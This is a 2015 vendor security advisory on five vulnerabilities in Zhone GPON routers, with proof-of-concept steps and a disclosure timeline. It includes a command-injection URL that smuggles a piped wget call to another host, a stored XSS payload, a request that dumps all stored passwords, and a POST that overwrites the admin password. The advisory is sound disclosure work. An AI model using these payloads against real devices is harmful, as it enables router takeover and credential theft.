Vantage Point Security Advisory 2015-002

1. Vantage Point Security Advisory 2015-002
2. ========================================
3.  
4. Title: Multiple Vulnerabilities found in ZHONE
5. Vendor: Zhone
6. Vendor URL: http://www.zhone.com
7. Device Model: ZHONE ZNID GPON 2426A
8. (24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
9. Versions affected: < S3.0.501
10. Severity: Low to medium
11. Vendor notified: Yes
12. Reported:
13. Public release:
14. Author: Lyon Yang <lyon[at]vantagepoint[dot]sg>
15. <lyon.yang.s[at]gmail[dot]com>
16.  
17. Summary:
18. --------
19.  
20. 1. Insecure Direct Object Reference (CVE-2014-8356)
21. ---------------------------------------------------
22.  
23. The administrative web application does not enforce authorization on the
24. server side. User access is restricted via Javascript only, by display
25. available functions for each particular user based on their privileges. Low
26. privileged users of the Zhone Router can therefore gain unrestricted access
27. to administrative functionality, e.g. by modifying the javascript responses
28. returned by the Zhone web server.
29.  
30. Affected URL: http://<Router URL>/menuBcm.js
31.  
32. To demonstrate the issue:
33.  
34. 1. Set your browser proxy to Burp Suite
35.  
36. 2. Add the following option to "Match and Replace". Match for the string
37. 'admin' and replace with your low privilege user:
38.  
39. 3. Login to the Zhone Administrative via your browser with Burp Proxy and
40. you will have full administrative access via the Zhone Web Administrative
41. Portal.
42.  
43.  
44. 2. Admin Password Disclosure (CVE-2014-8357)
45. --------------------------------------------
46.  
47. Any low-privileged user of the ZHONE Router Web Administrative Portal can
48. obtain all users passwords stored in the ZHONE web server. The ZHONE router
49. uses Base64 encoding to store all users passwords for logging in to the Web
50. Administrative portal. As these passwords are stored in the backup file, a
51. malicious user can obtain all account passwords.
52.  
53. Affected URL: http://<Router URL>/
54.  
55. 1. Browse to http://192.168.1.1/backupsettings.html:
56.  
57. 2. "View Source" and take note of the sessionKey:
58.  
59. 3. Browse to http://<Router
60. URL>/backupsettings.conf?action=getConfig&sessionKey=<Enter Session
61. Key Here>. and all user account passwords will be returned.
62.  
63.  
64. 3. Remote Code Injection (CVE-2014-9118)
65. ----------------------------------------
66.  
67. Remote Command Injection in ZHONE Router Web Administrative Console
68.  
69. Any user of the ZHONE Router can gain command injection on the router and
70. can execute arbitrary commands on the host operating system via the
71. vulnerable ZHONE router web administrative console.
72.  
73. Affected URL:
74.  
75. /zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20
76. http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3
77.  
78. Affected Parameter:
79.  
80. ipAddr
81.  
82.  
83. 4. Stored Cross-Site Scripting
84. ---------------------------------------------------------------------------------------
85.  
86. The zhnsystemconfig.cgi script is vulnerable to a stored cross-site
87. scripting attack.
88.  
89. Sample HTTP Request:
90.  
91. GET /zhnsystemconfig.cgi?snmpSysName=ZNID24xxA-
92. Route&snmpSysContact=Zhone%20Global%20Support&snmpSysLocation=www.zhone.com
93. %3Cscript%3Ealert(1)%3C/script%3E&sessionKey=1853320716 HTTP/1.1
94. Host: 192.168.1.1
95. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
96. Gecko/20100101 Firefox/35.0
97. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
98. Accept-Language: en-US,en;q=0.5
99. Accept-Encoding: gzip, deflate
100. Referer: http://192.168.1.1/zhnsystemconfig.html
101. Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
102. Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
103. Connection: keep-alive
104.  
105. Affected Parameters:
106. 1. snmpSysName
107. 2. snmpSysLocation
108. 3. snmpSysContact
109.  
110.  
111. 5. Privilege Escalation via Direct Object Reference to Upload Settings
112. Functionality
113. ---------------------------------------------------------------------------------------
114.  
115. A low-privileged user can patch the router settings via the
116. /uploadsettings.cgi page. With this functionality, the malicious attacker
117. is able to patch the admin and support password, hence gaining full
118. administrative access to the Zhone router.
119.  
120. Sample POST Request:
121.  
122. POST /uploadsettings.cgi HTTP/1.1
123. Host: 192.168.1.1
124. Accept-Encoding: gzip, deflate
125. Referer: http://192.168.1.1/updatesettings.html
126. Cookie: dm_install=no; dm_enable=no; hwaddr=54:A0:50:E4:F5:C0
127. Connection: keep-alive
128. Content-Type: multipart/form-data; boundary=---------------------------
129. 75010019812050198961998600862
130. Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
131. Content-Length: 88438
132.  
133. -----------------------------75010019812050198961998600862
134. Content-Disposition: form-data; name="filename";
135. filename="backupsettings.conf" Content-Type: config/conf
136. <?xml version="1.0"?> <DslCpeConfig version="3.2">
137. ...
138. <AdminPassword>dnFmMUJyM3oB</AdminPassword>
139. ...
140. --- Configuration File Contents ---
141. </DslCpeConfig>
142.  
143.  
144. Fix Information:
145. ----------------
146.  
147. Upgrade to version S3.1.241
148.  
149.  
150. Timeline:
151. ---------
152.  
153. 2014/10: Issues No. (1 & 2) reported to Zhone
154. 2014/12: Issues No. (1 & 3) reported to Zhone
155. 2015/01: Requested Update
156. 2015/01: Fixes Provided by Zhone, but vulnerabilities still not fixed
157. 2015/02: Sent P.O.C Video to show how vulnerabilities work
158. 2015/03: Fixes Provided by Zhone, but vulnerabilities still not fixed
159. 2015/04: Requested Update
160. 2015/04: Issues No. (4 & 5) reported to Zhone
161. 2015/06: Requested Update
162. 2015/08: Requested Update
163. 2015/09: Fixes for issue 1, 4 and 5 completed by Zhone
164. 2015/10: Confirm that all issues has been fixed
165.  
166.  
167. About Vantage Point Security:
168. --------------------
169.  
170. Vantage Point is the leading provider for penetration testing and security
171. advisory services in Singapore. Clients in the Financial, Banking and
172. Telecommunications industries select Vantage Point Security based on
173. technical competency and a proven track record to deliver significant and
174. measurable improvements in their security posture.
175.  
176. https://www.vantagepoint.sg/
177. office[at]vantagepoint[dot]sg